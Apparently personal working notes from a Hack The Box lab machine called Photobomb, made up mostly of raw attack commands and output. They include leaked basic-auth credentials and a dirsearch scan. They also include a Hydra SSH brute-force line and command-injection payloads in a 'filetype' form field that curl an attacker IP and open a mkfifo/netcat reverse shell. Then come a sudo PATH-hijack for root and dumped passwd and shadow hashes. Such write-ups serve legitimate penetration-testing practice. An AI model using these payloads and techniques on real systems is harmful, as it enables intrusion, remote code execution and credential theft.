--------------------------------------------------------------------------------------------------------------------------------------------------------
http://photobomb.htb/robbot.txt
 <h2>Sinatra doesn’t know this ditty.</h2>
  <img src='http://127.0.0.1:4567/__sinatra__/404.png'>
  <div id="c">
    Try this:
    <pre>get &#x27;&#x2F;robots.txt&#x27; do
  &quot;Hello World&quot;
end
</pre>

http://photobomb.htb/photobomb.js
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

pH0t0:b0Mb!

'http://127.0.0.1:4567/__sinatra__/404.png'> ?????

dirsearch -u photobomb.htb:80 -e "*" -r --auth "pH0t0:b0Mb!" --auth-type "basic"

--------------------------------------------------------------------------------------------------------------------------------------------------------
debugger enable 

POST /printer HTTP/1.1
Host: photobomb.htb
Content-Length: 80 --> wrong content lenght 
Cache-Control: max-age=0
Authorization: Basic cEgwdDA6YjBNYiE=
Upgrade-Insecure-Requests: 1
Origin: http://photobomb.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://photobomb.htb/printer
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

photo=masaaki-komori-NYFaNoiPf7A-unsplash.jpg&filetype=png;curl%2010.10.16.9:8000&dimensions=1000x1500

--------------------------------------------------------------------------------------------------------------------------------------------------------
hydra -l jameson -P /home/kali/Desktop/rockyou.txt 10.10.11.182 -t 4 ssh
--------------------------------------------------------------------------------------------------------------------------------------------------------
photo=masaaki-komori-NYFaNoiPf7A-unsplash.jpg&filetype=png;curl%2010.10.16.9:8000&dimensions=1000x1500
photo=masaaki-komori-NYFaNoiPf7A-unsplash.jpg&filetype=png;a=$(whoami);curl%2010.10.16.9:8000?a=$a&dimensions=1000x1500
wizard

rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|sh%20-i%202>&1|nc%2010.10.16.9%207050%20>/tmp/f

nc -lnvp 7050
photo=masaaki-komori-NYFaNoiPf7A-unsplash.jpg&filetype=png;rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|sh%20-i%202>%261|nc%2010.10.16.9%207050%20>/tmp/f&dimensions=1000x1500
python3 -c 'import pty; pty.spawn("/bin/bash")'
--------------------------------------------------------------------------------------------------------------------------------------------------------
pspy

2022/11/22 09:25:01 CMD: UID=0    PID=1      | /sbin/init maybe-ubiquity
2022/11/22 09:25:01 CMD: UID=0    PID=4657   | /usr/sbin/CRON -f
2022/11/22 09:25:01 CMD: UID=1000 PID=4660   | sudo /opt/cleanup.sh
2022/11/22 09:25:01 CMD: UID=1000 PID=4659   | /bin/sh -c sudo /opt/cleanup.sh
2022/11/22 09:25:01 CMD: UID=0    PID=4661   | /bin/bash /opt/cleanup.sh
2022/11/22 09:25:01 CMD: UID=0    PID=4665   | /bin/cat log/photobomb.log
2022/11/22 09:25:01 CMD: UID=0    PID=4667   | find source_images -type f -name *.jpg -exec chown root:root {} ;
2022/11/22 09:25:01 CMD: UID=0    PID=4669   | find source_images -type f -name *.jpg -exec chown root:root {} ;
2022/11/22 09:25:01 CMD: UID=0    PID=4670   |
2022/11/22 09:25:01 CMD: UID=???  PID=4671   | ???
2022/11/22 09:25:07 CMD: UID=0    PID=4680   |


2022/11/22 10:25:13 CMD: UID=0    PID=463    | /lib/systemd/systemd-journald

2022/11/22 10:25:13 CMD: UID=100  PID=498    | /lib/systemd/systemd-networkd
2022/11/22 10:25:13 CMD: UID=0    PID=495    | /lib/systemd/systemd-udevd

2022/11/22 10:25:13 CMD: UID=0    PID=901    | /sbin/agetty -o -p -- \u --noclear tty1 linux
2022/11/22 10:25:13 CMD: UID=0    PID=90     |
2022/11/22 10:25:13 CMD: UID=0    PID=9      |
2022/11/22 10:25:13 CMD: UID=33   PID=898    | nginx: worker process
2022/11/22 10:25:13 CMD: UID=33   PID=897    | nginx: worker process
2022/11/22 10:25:13 CMD: UID=0    PID=896    | nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
2022/11/22 10:25:13 CMD: UID=0    PID=887    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2022/11/22 10:25:13 CMD: UID=0    PID=886    | /usr/sbin/atd -f
2022/11/22 10:25:13 CMD: UID=0    PID=883    | /usr/sbin/cron -f
2022/11/22 10:25:13 CMD: UID=0    PID=87     |
2022/11/22 10:25:13 CMD: UID=0    PID=86     |
2022/11/22 10:25:13 CMD: UID=0    PID=85     |
2022/11/22 10:25:13 CMD: UID=101  PID=841    | /lib/systemd/systemd-resolved
2022/11/22 10:25:13 CMD: UID=0    PID=84     |
2022/11/22 10:25:13 CMD: UID=0    PID=83     |
2022/11/22 10:25:13 CMD: UID=0    PID=82     |
2022/11/22 10:25:13 CMD: UID=0    PID=81     |
2022/11/22 10:25:13 CMD: UID=0    PID=80     |
2022/11/22 10:25:13 CMD: UID=0    PID=8      |
2022/11/22 10:25:13 CMD: UID=0    PID=79     |
2022/11/22 10:25:13 CMD: UID=0    PID=768    | /usr/sbin/ModemManager
2022/11/22 10:25:13 CMD: UID=1000 PID=765    | ruby server.rb
2022/11/22 10:25:13 CMD: UID=0    PID=747    | /usr/lib/udisks2/udisksd
2022/11/22 10:25:13 CMD: UID=0    PID=746    | /lib/systemd/systemd-logind
2022/11/22 10:25:13 CMD: UID=104  PID=742    | /usr/sbin/rsyslogd -n -iNONE
2022/11/22 10:25:13 CMD: UID=0    PID=738    | /usr/lib/policykit-1/polkitd --no-debug
2022/11/22 10:25:13 CMD: UID=1000 PID=736    | /bin/sh /home/wizard/photobomb/photobomb.sh
2022/11/22 10:25:13 CMD: UID=0    PID=734    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2022/11/22 10:25:13 CMD: UID=0    PID=733    | /usr/sbin/irqbalance --foreground
2022/11/22 10:25:13 CMD: UID=103  PID=724    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2022/11/22 10:25:13 CMD: UID=0    PID=723    | /usr/lib/accountsservice/accounts-daemon
2022/11/22 10:25:13 CMD: UID=0    PID=674    | /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
2022/11/22 10:25:13 CMD: UID=0    PID=660    | /usr/bin/vmtoolsd
2022/11/22 10:25:13 CMD: UID=1000 PID=6538   | ./pspy64
2022/11/22 10:25:13 CMD: UID=0    PID=653    | /usr/bin/VGAuthService
2022/11/22 10:25:13 CMD: UID=102  PID=645    | /lib/systemd/systemd-timesyncd
2022/11/22 10:25:13 CMD: UID=0    PID=6389   |
2022/11/22 10:25:13 CMD: UID=0    PID=623    | /sbin/multipathd -d -s


--------------------------------------------------------------------------------------------------------------------------------------------------------

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
wizard:x:1000:1000:wizard:/home/wizard:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false

--------------------------------------------------------------------------------------------------------------------------------------------------------

export PATH="/home/wizard/photobomb:$PATH"

export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

export PATH=/home/wizard/test:$PATH

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games


--------------------------------------------------------------------------------------------------------------------------------------------------------

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.17 7051 >/tmp/f

sudo PATH=/home/wizard/test/:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games /opt/cleanup.sh

--------------------------------------------------------------------------------------------------------------------------------------------------------

root:$6$7MU2U.CeiY0WX91P$TUNn8zNu/XUPSgURRJbzYvnnawpZdGhsWiLSpVrm1cIx9Rev7V/yQ5x58gTy98zcXrv6RqlWRtXcbhEhTl3240:19251:0:99999:7:::



--------------------------------------------------------------------------------------------------------------------------------------------------------

root:$6$7MU2U.CeiY0WX91P$TUNn8zNu/XUPSgURRJbzYvnnawpZdGhsWiLSpVrm1cIx9Rev7V/yQ5x58gTy98zcXrv6RqlWRtXcbhEhTl3240:19251:0:99999:7:::
daemon:*:19046:0:99999:7:::
bin:*:19046:0:99999:7:::
sys:*:19046:0:99999:7:::
sync:*:19046:0:99999:7:::
games:*:19046:0:99999:7:::
man:*:19046:0:99999:7:::
lp:*:19046:0:99999:7:::
mail:*:19046:0:99999:7:::
news:*:19046:0:99999:7:::
uucp:*:19046:0:99999:7:::
proxy:*:19046:0:99999:7:::
www-data:*:19046:0:99999:7:::
backup:*:19046:0:99999:7:::
list:*:19046:0:99999:7:::
irc:*:19046:0:99999:7:::
gnats:*:19046:0:99999:7:::
nobody:*:19046:0:99999:7:::
systemd-network:*:19046:0:99999:7:::
systemd-resolve:*:19046:0:99999:7:::
systemd-timesync:*:19046:0:99999:7:::
messagebus:*:19046:0:99999:7:::
syslog:*:19046:0:99999:7:::
_apt:*:19046:0:99999:7:::
tss:*:19046:0:99999:7:::
uuidd:*:19046:0:99999:7:::
tcpdump:*:19046:0:99999:7:::
landscape:*:19046:0:99999:7:::
pollinate:*:19046:0:99999:7:::
usbmux:*:19067:0:99999:7:::
sshd:*:19067:0:99999:7:::
systemd-coredump:!!:19067::::::
wizard:$6$qmjmqNE6eDSugXXx$KSXyEnRqlVcnAOT9iqxGRsrwnakYHAlF8mNMpEE75i3ZHA0T23OVnedmK3rbaw2gMFbLekluAtgByD/mySzsy1:19077:0:99999:7:::
lxd:!:19067::::::
--------------------------------------------------------------------------------------------------------------------------------------------------------

ref:https://www.youtube.com/watch?v=bzjnIi5u9OQ
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#setenv

--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------
